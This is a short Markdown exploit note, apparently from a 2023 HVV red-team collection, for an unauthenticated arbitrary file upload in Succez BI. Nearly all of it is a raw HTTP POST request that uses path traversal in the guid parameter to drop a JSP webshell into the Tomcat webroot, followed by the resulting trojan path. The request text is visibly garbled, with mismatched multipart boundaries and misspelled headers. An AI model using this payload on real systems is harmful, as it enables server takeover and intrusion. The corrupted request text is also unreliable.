2023Hvv/赛思SuccezBI前台任意文件上传.md
2023-08-17 15:46:41 +08:00

31 lines
1011 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

```
POsT /succezbi/sz/commons/form/file/uploadChunkFile:guid=../tomcat/webapps/ROOT/&chunk=ss.jsp HTTP/1.1
Host: 10.168.4.99:808
Content-Length: 49564
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8GeAY18LCxR7XnVp
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 15 7) Applewebkit/537.36 (KHTML, likeGecko) Chrome/106.9.. Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;g=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip deflate
Accept-Language: zh-CN,zh;g=0.9
Cookie: JSESSIONID=7351EFC189410384FF702A41106FF4A2
Connection: close
-----WebKitFormBoundarv8GeAY18LCXR7XnVPContent-Disposition:
form-data; name="file"; filename="ww'
Content-Type: image/jpeg
webshell
-----WebKitFormBoundarv8GeAY18LCXR7XnVP
Content-Disposition: form-data; name="tijiao'
confirm
------WebKitFormBoundarv8GeAY18LCXR7XnVP--
```
木马地址ww_ss.jsp